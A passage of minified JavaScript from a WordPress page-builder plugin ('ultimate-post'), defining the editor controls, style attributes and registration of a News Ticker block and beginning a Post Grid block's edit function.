1","ultimate-post")},{value:"Angle",label:__("Icon 2","ultimate-post")},{value:"ArrowLg",label:__("Icon 3","ultimate-post")}]}},{position:4,data:{type:"dimension",key:"tickNavSize",step:1,unit:!0,responsive:!0,label:__("Icon Padding","ultimate-post")}},{position:5,data:{type:"tab",content:[{name:"normal",title:__("Normal","ultimate-post"),options:[{type:"color",key:"TickNavColor",label:__("Icon Color","ultimate-post")},{type:"color2",key:"TickNavBg",label:__("Icon Bg Color","ultimate-post")},{type:"border",key:"tickNavBorder",label:__("Border","ultimate-post")},{type:"separator",key:"TickNavPause",label:__("Pause Arrow Icon","ultimate-post")},{type:"color",key:"PauseColor",label:__("Pause Color","ultimate-post")},{type:"color2",key:"PauseBg",label:__("Pause Bg Color","ultimate-post")}]},{name:"hover",title:__("Hover","ultimate-post"),options:[{type:"color",key:"TickNavHovColor",label:__("Hover Color","ultimate-post")},{type:"color2",key:"TickNavHovBg",label:__("Hover Background","ultimate-post")},{type:"border",key:"tickNavHoverBorder",label:__("Border","ultimate-post")},{type:"separator",key:"TickNavPause",label:__("Pause Arrow Icon","ultimate-post")},{type:"color",key:"PauseHovColor",label:__("Pause Hover Color","ultimate-post")},{type:"color2",key:"PauseHovBg",label:__("Pause Hover Bg Color","ultimate-post")}]}]}}]}),(0,o.createElement)(a.T,{depend:"tickerHeading",store:G,title:__("Ticker Label","ultimate-post"),include:[{position:1,data:{type:"select",key:"tickShapeStyle",label:__("Ticker Shape","ultimate-post"),options:[{value:"normal",label:__("Normal","ultimate-post")},{pro:!0,value:"small",label:__("Small Shape","ultimate-post")},{pro:!0,value:"medium",label:__("Medium Shape","ultimate-post")},{pro:!0,value:"large",label:__("Large Shape","ultimate-post")}]}},{position:2,data:{type:"text",key:"headingText",label:__("Heading","ultimate-post")}},{position:3,data:{type:"color",key:"tickLabelColor",label:__("Color","ultimate-post")}},{position:4,data:{type:"color",key:"tickLabelBg",label:__("Label Background Color","ultimate-post")}},{position:5,data:{type:"typography",key:"tickLabelTypo",label:__("Typography","ultimate-post")}},{position:6,data:{type:"range",key:"tickLabelPadding",min:10,max:100,step:1,label:__("Padding","ultimate-post")}},{position:7,data:{type:"range",key:"tickLabelSpace",min:10,max:300,step:1,responsive:!0,label:__("Left Content Space","ultimate-post")}}]}),(0,o.createElement)(a.T,{store:G,title:__("Ticker Body","ultimate-post"),include:[{position:1,data:{type:"range",key:"tickerContentHeight",min:10,max:100,step:1,label:__("Content Height","ultimate-post")}},{position:2,data:{type:"color",key:"tickBodyColor",label:__("List Text Color","ultimate-post")}},{position:3,data:{type:"color",key:"tickBodyHovColor",label:__("List Text Hover Color","ultimate-post")}},{position:4,data:{type:"color",key:"tickerBodyBg",label:__("Background Color","ultimate-post")}},{position:5,data:{type:"typography",key:"tickBodyTypo",label:__("Body Text Typography","ultimate-post")}},{position:6,data:{type:"color",key:"tickBodyBorderColor",label:__("Border Prefix Color","ultimate-post")}},{position:7,data:{type:"border",key:"tickBodyBorder",label:__("Border","ultimate-post")}},{position:8,data:{type:"dimension",key:"tickBodyRadius",step:1,unit:!0,responsive:!0,label:__("Border Radius","ultimate-post")}},{position:9,data:{type:"range",key:"tickBodySpace",step:1,min:10,max:100,responsive:!0,step:1,label:__("List Space Between","ultimate-post")}},{position:10,data:{type:"select",key:"tickTxtStyle",label:__("Ticker List Style","ultimate-post"),options:[{value:"normal",label:__("- None -","ultimate-post")},{value:"circle",label:__("Circle","ultimate-post")},{value:"box",label:__("Box","ultimate-post")},{value:"hand",label:__("Hand","ultimate-post")},{value:"right-sign",label:__("Right Sign Icon","ultimate-post")},{value:"right-bold",label:__("Right Bold Sign Icon","ultimate-post")}]}},{position:11,data:{type:"color",key:"tickBodyListColor",label:__("List Style Color","ultimate-post")}}]}),"typewriter"!=N&&(0,o.createElement)(a.T,{depend:"tickTimeShow",store:G,title:__("Time Badge","ultimate-post"),include:[{position:1,data:{type:"tag",key:"timeBadgeType",label:__("Badge Type","ultimate-post"),options:[{value:"days_ago",label:"Days Ago"},{value:"date",label:"Date"}]}},{position:5,data:{type:"select",key:"timeBadgeDateFormat",label:__("Date/Time Format","ultimate-post"),options:[{value:"M j, Y",label:"Feb 7, 2024"},{value:"default_date",label:"WordPress Default Date Format",pro:!0},{value:"default_date_time",label:"WordPress Default Date & Time Format",pro:!0},{value:"g:i A",label:"1:12 PM",pro:!0},{value:"F j, Y",label:"February 7, 2024",pro:!0},{value:"F j, Y g:i A",label:"February 7, 2024 1:12 PM",pro:!0},{value:"M j, Y g:i A",label:"Feb 7, 2022 1:12 PM",pro:!0},{value:"j M Y",label:"7 Feb 2024",pro:!0},{value:"j M Y g:i A",label:"7 Feb 2022 1:12 PM",pro:!0},{value:"j F Y",label:"7 February 2022",pro:!0},{value:"j F Y g:i A",label:"7 February 2022 1:12 PM",pro:!0},{value:"j. M Y",label:"7. Feb 2022",pro:!0},{value:"j. M Y | H:i",label:"7. Feb 2022 | 1:12",pro:!0},{value:"j. F Y",label:"7. February 2022",pro:!0},{value:"j.m.Y",label:"7.02.2022",pro:!0},{value:"j.m.Y g:i A",label:"7.02.2022 1:12 PM",pro:!0}]}},{position:10,data:{type:"separator",key:"tickTimeBadge",label:__("Time Style","ultimate-post")}},{position:20,data:{type:"color",key:"timeBadgeColor",label:__("Time Badge Color","ultimate-post")}},{position:30,data:{type:"color2",key:"timeBadgeBg",label:__("Time Bg Color","ultimate-post")}},{position:40,data:{type:"typography",key:"timeBadgeTypo",label:__("Time Badge  Typography","ultimate-post")}},{position:50,data:{type:"dimension",key:"timeBadgeRadius",step:1,unit:!0,responsive:!0,label:__("Time Badge Radius","ultimate-post")}},{position:60,data:{type:"dimension",key:"timeBadgePadding",step:1,unit:!0,responsive:!0,label:__("Padding","ultimate-post")}}]}),(0,o.createElement)(a.T,{depend:"tickImageShow",store:G,title:__("Image","ultimate-post"),include:[{position:1,data:{type:"range",key:"tickImgWidth",min:10,max:100,step:1,label:__("image width","ultimate-post")}},{position:2,data:{type:"range",key:"tickImgSpace",min:10,max:100,step:1,label:__("image Space","ultimate-post")}},{position:3,data:{type:"dimension",key:"tickImgRadius",step:1,unit:!0,responsive:!0,label:__("Image Radius","ultimate-post")}}]})),(0,o.createElement)(n.Section,{slug:"advanced",title:__("Advanced","ultimate-post")},(0,o.createElement)(a.yB,{initialOpen:!0,store:G}),(0,o.createElement)(a.Mg,{pro:!0,store:G}),(0,o.createElement)(a.iv,{store:G}))),(0,a.dH)()),(0,o.createElement)(s.Z,{include:[{type:"query"},{type:"template"}],store:G}),(0,o.createElement)("div",$,q&&(0,o.createElement)("style",{dangerouslySetInnerHTML:{__html:q}}),(0,o.createElement)("div",{className:"ultp-block-wrapper"},function(){const e=(0,o.createElement)("button",{"aria-label":"Pause Current Post",className:"ultp-news-ticker-pause"}),t=p.ZP[`left${D}`],l=p.ZP[`right${D}`];return x.error?(0,o.createElement)(h,{label:__("Posts are not available","ultimate-post")},(0,o.createElement)("div",{style:{marginBottom:15}},__("Make sure Add Post.","ultimate-post"))):x.loading?(0,o.createElement)(h,{className:"ultp-backend-block-loading",label:__("Loading…","ultimate-post")}," ",(0,o.createElement)(v,null)):x.postsList.length>0?(0,o.createElement)("div",{className:"ultp-block-items-wrap"},(0,o.createElement)("div",{className:`ultp-news-ticker-${O} ultp-nav-${D} ultp-newsTicker-wrap ultp-newstick-${N}`},U&&j&&(0,o.createElement)("div",{className:"ultp-news-ticker-label"},j," ",(0,o.createElement)("span",null)," "),(0,o.createElement)("div",{className:"ultp-news-ticker-box"},(0,o.createElement)("ul",{className:"ultp-news-ticker"},x.postsList.map(((e,t)=>(0,o.createElement)("li",{key:t},(0,o.createElement)("div",{className:`ultp-list-${R}`},(0,o.createElement)("a",null,(M&&e.image?e.image.thumbnail:void 0)&&(0,o.createElement)("img",{src:e.image.thumbnail,alt:e.title}),e.title.replaceAll("&#038;","").replaceAll("&#8217;","'").replaceAll("&#8221;",'"')),Z&&"typewriter"!=N&&(0,o.createElement)("span",{className:"ultp-ticker-timebadge"},"date"==z?c((0,a.De)(F),e.time):e.post_time+" ago"))))))),A&&(0,o.createElement)("div",{className:"ultp-news-ticker-controls  ultp-news-ticker-vertical-controls"},(0,o.createElement)("button",{"aria-label":"Show Previous Post",className:"ultp-news-ticker-arrow ultp-news-ticker-prev"},t),("nav1"==O||"nav3"==O||"nav4"==O)&&H&&e,(0,o.createElement)("button",{"aria-label":"Show Next Post",className:"ultp-news-ticker-arrow ultp-news-ticker-next"},l)))):(0,o.createElement)(h,{className:"ultp-backend-block-loading",label:__("No Posts found","ultimate-post")},(0,o.createElement)(v,null))}())))}},48627:(e,t,l)=>{"use strict";l.d(t,{Z:()=>o});const o={blockId:{type:"string",default:""},previewImg:{type:"string",default:""},currentPostId:{type:"string",default:""},tickerType:{type:"string",default:"vertical"},tickerPositionEna:{type:"boolean",default:!1},tickerPosition:{type:"string",default:"up",style:[{depends:[{key:"tickerPositionEna",condition:"==",value:!0},{key:"tickerPosition",condition:"==",value:"up"}],selector:"{{ULTP}} .ultp-news-sticky .ultp-newsTicker-wrap { position: fixed;width: 100%;top: 0;z-index: 101; left: 0; } \n          .admin-bar .ultp-news-sticky .ultp-newsTicker-wrap { top: 32px !important; }"},{depends:[{key:"tickerPositionEna",condition:"==",value:!0},{key:"tickerPosition",condition:"==",value:"down"}],selector:"{{ULTP}} .ultp-news-sticky .ultp-newsTicker-wrap { position: fixed;width: 100%;bottom: 0; z-index: 9999999;left: 0; }"}]},tickerHeading:{type:"boolean",default:!0},tickTimeShow:{type:"boolean",default:!0,style:[{depends:[{key:"tickerType",condition:"!=",value:"typewriter"}]}]},tickImageShow:{type:"boolean",default:!1},navControlToggle:{type:"boolean",default:!0},controlToggle:{type:"boolean",default:!0,style:[{depends:[{key:"navControlToggle",condition:"==",value:!0},{key:"TickNavStyle",condition:"!=",value:"nav2"}]}]},pauseOnHover:{type:"boolean",default:!0},tickerDirectionVer:{type:"string",default:"up",style:[{depends:[{key:"tickerType",condition:"==",value:"vertical"},{key:"tickerAnimation",condition:"==",value:"slide"}]}]},tickerDirectionHorizon:{type:"string",default:"left",style:[{depends:[{key:"tickerType",condition:"==",value:"horizontal"},{key:"tickerAnimation",condition:"==",value:"slide"}]},{depends:[{key:"tickerType",condition:"==",value:"marquee"}]}]},tickerSpeed:{type:"string",default:"4000",style:[{depends:[{key:"tickerType",condition:"!=",value:"marquee"}]}]},marqueSpeed:{type:"string",default:"10",style:[{depends:[{key:"tickerType",condition:"==",value:"marquee"}]}]},tickerSpeedTypewriter:{type:"string",default:"50",style:[{depends:[{key:"tickerType",condition:"==",value:"typewriter"}]}]},tickerAnimation:{type:"string",default:"slide",style:[{depends:[{key:"tickerType",condition:"!=",value:"marquee"},{key:"tickerType",condition:"!=",value:"typewriter"}]}]},typeAnimation:{type:"string",default:"fadein",style:[{depends:[{key:"tickerType",condition:"==",value:"typewriter"}]}]},openInTab:{type:"boolean",default:!1},headingText:{type:"string",default:"News Ticker"},TickNavStyle:{type:"string",default:"nav1",style:[{depends:[{key:"navControlToggle",condition:"==",value:!0}]}]},TickNavIconStyle:{type:"string",default:"Angle2",style:[{depends:[{key:"navControlToggle",condition:"==",value:!0}]}]},tickNavSize:{type:"object",default:{lg:{top:6,bottom:6,left:6,right:6,unit:"px"}},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-arrow { padding:{{tickNavSize}} !important; height: auto !important; width: auto !important; }"}]},TickNavColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:after { border-color:{{TickNavColor}}}\n          {{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow svg { color:{{TickNavColor}}}"},{depends:[{key:"TickNavIconStyle",condition:"==",value:"icon2"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:after ,\n          {{ULTP}} button.ultp-news-ticker-arrow:before { border-right-color:{{TickNavColor}}; border-left-color: {{TickNavColor}}; } "}]},TickNavBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Primary_color)"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav1"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow"},{depends:[{key:"TickNavStyle",condition:"!=",value:"nav1"},{key:"TickNavStyle",condition:"!=",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls"}]},tickNavBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-arrow"}]},TickNavHovColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:hover:after { border-color:{{TickNavHovColor}}}\n          {{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow svg:hover { color:{{TickNavHovColor}}}"},{depends:[{key:"TickNavIconStyle",condition:"==",value:"icon2"}],selector:"{{ULTP}} button.ultp-news-ticker-arrow:hover:after ,\n          {{ULTP}} button.ultp-news-ticker-arrow:hover:before{ border-right-color:{{TickNavHovColor}}; border-left-color:{{TickNavHovColor}}; } "}]},TickNavHovBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Secondary_color)"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav1"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:hover"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:hover"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav3"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-arrow:hover"},{depends:[{key:"TickNavStyle",condition:"!=",value:"nav1"},{key:"TickNavStyle",condition:"!=",value:"nav2"},{key:"TickNavStyle",condition:"!=",value:"nav3"}],selector:"{{ULTP}} .ultp-news-ticker-controls:hover"}]},tickNavHoverBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav2"}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-arrow:hover"}]},TickNavPause:{type:"string",default:"Pause Icon Style",style:[{depends:[{key:"TickNavStyle",condition:"!=",value:"nav2"},{key:"controlToggle",condition:"==",value:!0}]}]},PauseColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{depends:[{key:"TickNavStyle",condition:"!=",value:"nav2"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause:before,\n          {{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause:before,\n          {{ULTP}} .ultp-news-ticker-nav4 button.ultp-news-ticker-pause:before { border-color:{{PauseColor}};}"}]},PauseHovColor:{type:"string",default:"var(--postx_preset_Contrast_2_color)",style:[{depends:[{key:"TickNavIconStyle",condition:"!=",value:"icon2"},{key:"controlToggle",condition:"==",value:!0},{key:"TickNavStyle",condition:"==",value:"nav1"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause:hover:before { border-color:{{PauseHovColor}};}"},{depends:[{key:"TickNavIconStyle",condition:"!=",value:"icon2"},{key:"controlToggle",condition:"==",value:!0},{key:"TickNavStyle",condition:"==",value:"nav3"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause:hover:before { border-color:{{PauseHovColor}};}"},{depends:[{key:"TickNavIconStyle",condition:"!=",value:"icon2"},{key:"controlToggle",condition:"==",value:!0},{key:"TickNavStyle",condition:"==",value:"nav4"}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause:hover:before { border-color:{{PauseHovColor}};}"}]},PauseBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_3_color)"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav1"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav3"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls button.ultp-news-ticker-pause"}]},PauseHovBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Base_2_color)"},style:[{depends:[{key:"TickNavStyle",condition:"==",value:"nav1"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-pause:hover"},{depends:[{key:"TickNavStyle",condition:"==",value:"nav3"},{key:"controlToggle",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker-controls .ultp-news-ticker-pause:hover"}]},tickLabelColor:{type:"string",default:"var(--postx_preset_Over_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-label { color:{{tickLabelColor}}; } "}]},tickLabelBg:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-label{background-color:{{tickLabelBg}};}"},{depends:[{key:"tickShapeStyle",condition:"!=",value:"normal"}],selector:"{{ULTP}} .ultp-news-ticker-label::after{ border-color:transparent transparent transparent {{tickLabelBg}} !important; }"}]},tickLabelTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"27",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-news-ticker-label"}]},tickLabelPadding:{type:"string",default:"15",style:[{selector:"{{ULTP}} .ultp-news-ticker-label { padding:0px {{tickLabelPadding}}px; }"}]},tickLabelSpace:{type:"object",default:{lg:"160"},style:[{selector:"{{ULTP}} .ultp-news-ticker-box { padding-left:{{tickLabelSpace}}px; } \n          .rtl {{ULTP}} .ultp-news-ticker-box { padding-right:{{tickLabelSpace}}px !important; }"}]},tickShapeStyle:{type:"string",default:"normal",style:[{depends:[{key:"tickShapeStyle",condition:"==",value:"large"}],selector:"{{ULTP}} .ultp-news-ticker-label::after {border-top: 23px solid; border-left: 24px solid; border-bottom: 23px solid; right: -24px;border-color:transparent; }"},{depends:[{key:"tickShapeStyle",condition:"==",value:"medium"}],selector:"{{ULTP}} .ultp-news-ticker-label::after { border-top: 17px solid; border-left: 20px solid;border-bottom: 17px solid;border-color:transparent;right:-20px;}"},{depends:[{key:"tickShapeStyle",condition:"==",value:"small"}],selector:"{{ULTP}} .ultp-news-ticker-label::after { border-top: 12px solid;border-left: 15px solid; border-bottom: 12px solid;border-color: transparent;right: -14px; }"},{depends:[{key:"tickShapeStyle",condition:"==",value:"normal"}],selector:"{{ULTP}} .ultp-news-ticker-label::after {display:none !important;}"}]},tickerContentHeight:{type:"string",default:"45",style:[{selector:"{{ULTP}} .ultp-news-ticker li,\n          .editor-styles-wrapper {{ULTP}} .ultp-newsTicker-wrap ul li,\n          {{ULTP}} .ultp-news-ticker-label,\n          {{ULTP}} .ultp-newsTicker-wrap,\n          {{ULTP}} .ultp-news-ticker-controls,\n          {{ULTP}} .ultp-news-ticker-controls button { height:{{tickerContentHeight}}px; }"}]},tickBodyColor:{type:"string",default:"var(--postx_preset_Contrast_1_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker li a,\n          {{ULTP}} .ultp-news-ticker li div a,\n          {{ULTP}} .ultp-news-ticker li div a span { color:{{tickBodyColor}}; }"}]},tickBodyHovColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker li a:hover,\n          {{ULTP}} .ultp-news-ticker li div:hover,\n          {{ULTP}} .ultp-news-ticker li div a:hover span { color:{{tickBodyHovColor}}; }"}]},tickBodyListColor:{type:"string",default:"var(--postx_preset_Primary_color)",style:[{depends:[{key:"tickTxtStyle",condition:"==",value:"box"}],selector:"{{ULTP}} .ultp-list-box::before { background-color:{{tickBodyListColor}};}"},{depends:[{key:"tickTxtStyle",condition:"==",value:"circle"}],selector:"{{ULTP}} .ultp-list-circle::before { background-color:{{tickBodyListColor}};}"},{depends:[{key:"tickTxtStyle",condition:"==",value:"hand"}],selector:"{{ULTP}} .ultp-list-hand::before { color:{{tickBodyListColor}};}"},{depends:[{key:"tickTxtStyle",condition:"==",value:"right-sign"}],selector:"{{ULTP}} .ultp-list-right-sign::before { color:{{tickBodyListColor}};}"},{depends:[{key:"tickTxtStyle",condition:"==",value:"right-bold"}],selector:"{{ULTP}} .ultp-list-right-bold::before { color:{{tickBodyListColor}};}"}]},tickerBodyBg:{type:"string",default:"var(--postx_preset_Base_2_color)",style:[{selector:"{{ULTP}} .ultp-news-ticker-box,\n          {{ULTP}} .ultp-news-ticker-controls { background-color:{{tickerBodyBg}} }"}]},tickBodyTypo:{type:"object",default:{openTypography:1,size:{lg:"16",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"16",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{selector:"{{ULTP}} .ultp-news-ticker li a"}]},tickBodyBorderColor:{type:"string",default:"",style:[{selector:"{{ULTP}} .ultp-newsTicker-wrap { background-color:{{tickBodyBorderColor}};border-color:{{tickBodyBorderColor}} }"}]},tickBodyBorder:{type:"object",default:{openBorder:0,disableColor:!0,width:{top:0,right:0,bottom:0,left:0},type:"solid"},style:[{selector:"{{ULTP}} .ultp-newsTicker-wrap"}]},tickBodyRadius:{type:"object",default:{lg:"",unit:"px"},style:[{selector:"{{ULTP}} .ultp-newsTicker-wrap,\n          {{ULTP}} .ultp-news-ticker-label,\n          {{ULTP}} .ultp-news-ticker-box { border-radius:{{tickBodyRadius}}; }\n          {{ULTP}} .ultp-news-ticker-prev { border-top-right-radius:0px !important; border-bottom-right-radius:0px !important; border-radius: {{tickBodyRadius}}; }"}]},tickTxtStyle:{type:"string",default:"normal",style:[{selector:"{{ULTP}} .ultp-news-ticker li { list-style-type:none; }"}]},tickImgWidth:{type:"string",default:"30",style:[{depends:[{key:"tickImageShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker li div img {width:{{tickImgWidth}}px}"}]},tickImgSpace:{type:"string",default:"10",style:[{depends:[{key:"tickImageShow",condition:"==",value:!0}],selector:"{{ULTP}} .ultp-news-ticker li div img { margin-right: {{tickImgSpace}}px; } \n          .rtl {{ULTP}} .ultp-news-ticker li div img { margin-left: {{tickImgSpace}}px !important; }"}]},tickImgRadius:{type:"object",default:{lg:{top:"30",bottom:"30",left:"30",right:"30",unit:"px"}},style:[{selector:"{{ULTP}} .ultp-news-ticker li div img { border-radius:{{tickImgRadius}}; }"}]},tickBodySpace:{type:"object",default:{lg:"21"},style:[{depends:[{key:"tickerType",condition:"==",value:"marquee"}],selector:"{{ULTP}} .ultp-news-ticker { gap:{{tickBodySpace}}px; }"}]},timeBadgeType:{type:"string",default:"days_ago"},timeBadgeDateFormat:{type:"string",default:"M j, Y",style:[{depends:[{key:"timeBadgeType",condition:"==",value:"date"}]}]},tickTimeBadge:{type:"string",default:"Time Badge",style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}]}]},timeBadgeColor:{type:"string",default:"var(--postx_preset_Base_1_color)",style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}],selector:"{{ULTP}} .ultp-ticker-timebadge { color:{{timeBadgeColor}}; }"}]},timeBadgeBg:{type:"object",default:{openColor:1,type:"color",color:"var(--postx_preset_Contrast_1_color)"},style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}],selector:"{{ULTP}} .ultp-ticker-timebadge"}]},timeBadgeTypo:{type:"object",default:{openTypography:1,size:{lg:"12",unit:"px"},spacing:{lg:"0",unit:"px"},height:{lg:"16",unit:"px"},decoration:"none",transform:"",family:"",weight:"500"},style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}],selector:"{{ULTP}} .ultp-news-ticker li .ultp-ticker-timebadge"}]},timeBadgeRadius:{type:"object",default:{lg:{top:"100",bottom:"100",left:"100",right:"100",unit:"px"}},style:[{depends:[{key:"tickTimeShow",condition:"==",value:!0},{key:"tickerType",condition:"!=",value:"typewriter"}],selector:"{{ULTP}} .ultp-ticker-timebadge { border-radius:{{timeBadgeRadius}}; }"}]},timeBadgePadding:{type:"object",default:{lg:{top:3,bottom:3,left:6,right:6,unit:"px"}},style:[{selector:"{{ULTP}} .ultp-ticker-timebadge { padding: {{timeBadgePadding}} }"}]},...(0,l(92165).t)(["advanceAttr","query"],["loadingColor","queryInclude"],[{key:"queryNumPosts",default:{lg:4}}])}},84764:(e,t,l)=>{"use strict";var o=l(67294),a=l(83100),i=l(47214),n=l(48627),r=l(59963);const{__}=wp.i18n,{registerBlockType:s}=wp.blocks,p=(0,a.Z)("https://wpxpo.com/docs/postx/all-blocks/news-ticker-block/","block_docs");s(r,{icon:(0,o.createElement)("img",{className:"ultp-block-icon",src:ultp_data.url+"assets/img/blocks/news-ticker.svg"}),description:(0,o.createElement)("span",{className:"ultp-block-info"},__("News Ticker in the classic style.","ultimate-post"),(0,o.createElement)("a",{target:"_blank",href:p,rel:"noreferrer"},__("Documentation","ultimate-post"))),attributes:n.Z,example:{attributes:{previewImg:ultp_data.url+"assets/img/preview/newsticker.svg"}},edit:i.Z,save:()=>null})},13452:(e,t,l)=>{"use strict";l.d(t,{Z:()=>M});var o=l(67294),a=l(53049),i=l(73151),n=l(23890),r=l(49491),s=l(53105),p=l(29236),c=l(53508),u=l(46896),d=l(71411),m=l(93985),g=l(8152),y=l(76005),b=l(99838),v=l(69735),h=l(2963),f=l(39349),k=l(87025),w=l(31760),x=l(38196);const{__}=wp.i18n,{InspectorControls:T,useBlockProps:_}=wp.blockEditor,{useState:C,useRef:E,useEffect:S,Fragment:P}=wp.element,{Spinner:L,Placeholder:I}=wp.components,{getBlockAttributes:B,getBlockRootClientId:U}=wp.data.select("core/block-editor");function M(e){const t=E(null),{setAttributes:l,name:M,isSelected:A,clientId:H,context:N,attributes:j,className:Z,attributes:{blockId:O,advanceId:R,paginationShow:D,paginationAjax:z,headingShow:F,filterShow:W,paginationType:V,navPosition:G,paginationNav:q,loadMoreText:$,paginationText:K,V4_1_0_CompCheck:{runComp:J},previewImg:Y,readMoreIcon:X,imgCrop:Q,imgCropSmall:ee,gridStyle:te,excerptLimit:le,columns:oe,metaStyle:ae,metaShow:ie,catShow:ne,showImage:re,metaSeparator:se,titleShow:pe,catStyle:ce,catPosition:ue,titlePosition:de,excerptShow:me,showFullExcerpt:ge,imgAnimation:ye,imgOverlayType:be,imgOverlay:ve,metaList:he,readMore:fe,readMoreText:ke,metaPosition:we,layout:xe,customCatColor:Te,onlyCatColor:_e,contentTag:Ce,titleTag:Ee,showSeoMeta:Se,titleLength:Pe,metaMinText:Le,metaAuthorPrefix:Ie,titleStyle:Be,metaDateFormat:Ue,authorLink:Me,fallbackEnable:Ae,vidIconEnable:He,notFoundMessage:Ne,dcEnabled:je,dcFields:Ze,currentPostId:Oe}}=e,[Re,De]=C(k.Ti),[ze,Fe]=C(null);function We(e){De({...Re,selectedDC:e})}function Ve(){De({...Re,selectedDC:"0,0,1",toolbarSettings:"dc_field"})}function Ge(e){De({...Re,section:{...k.ZQ,[e]:!0}}),(0,k.Rt)(e),(0,k.ob)(e),Fe("setting")}function qe(e){De((t=>({...t,toolbarSettings:e}))),(0,k.os)(e)}S((()=>{(0,k.oA)(),(0,k.t2)(j,Re,De)}),[]),S((()=>{const t=H.substr(0,6),o=B(U(H));(0,a.qi)(l,o,Oe,H),(0,i.h)(e),O?O&&O!=t&&(o?.hasOwnProperty("ref")||(0,a.k0)()||o?.hasOwnProperty("theme")||l({blockId:t})):(l({blockId:t}),ultp_data.archive&&"archive"==ultp_data.archive&&l({queryType:"archiveBuilder"}))}),[H]),S((()=>{const e=t.current;(0,v.o6)()&&0===j.dcFields.length&&l({dcFields:Array(x.PR).fill(void 0)}),e?((0,a.Qr)(e,j)&&((0,k.t2)(j,Re,De),t.current=j),e.isSelected!==A&&A&&(0,k.gT)(Ge,qe)):t.current=j}),[j]);const $e={settingTab:ze,setSettingTab:Fe,setAttributes:l,name:M,attributes:j,setSection:Ge,section:Re.section,clientId:H,context:N,setSelectedDc:We,selectedDC:Re.selectedDC,selectParentMetaGroup:function(e){We(e),qe("dc_group")}};let Ke;if(O&&(Ke=(0,b.Kh)(j,"ultimate-post/post-grid-1",O,(0,a.k0)())),Y&&!A)return(0,o.createElement)("img",{style:{marginTop:"0px",width:"420px"},src:Y});S((()=>{A&&Y&&l({previewImg:""})}),[e?.isSelected]);const Je=_({...R&&{id:R},className:`ultp-block-${O} ${Z}`,onClick:e=>{e.stopPropagation(),Ge("general"),qe("")}});return(0,o.createElement)(P,null,(0,o.createElement)(x.FP,{store:$e,selected:Re.toolbarSettings}),(0,o.createElement)(T,null,(0,o.createElement)(x.ZP,{store:$e})),(0,o.createElement)(w.Z,{include:[{type:"query"},{type:"template"},{type:"grid_align",key:"contentAlign"},{type:"grid_spacing",include:[{position:1,data:{type:"range",key:"rowSpace",min:0,max:80,step:1,responsive:!0,label:__("Row 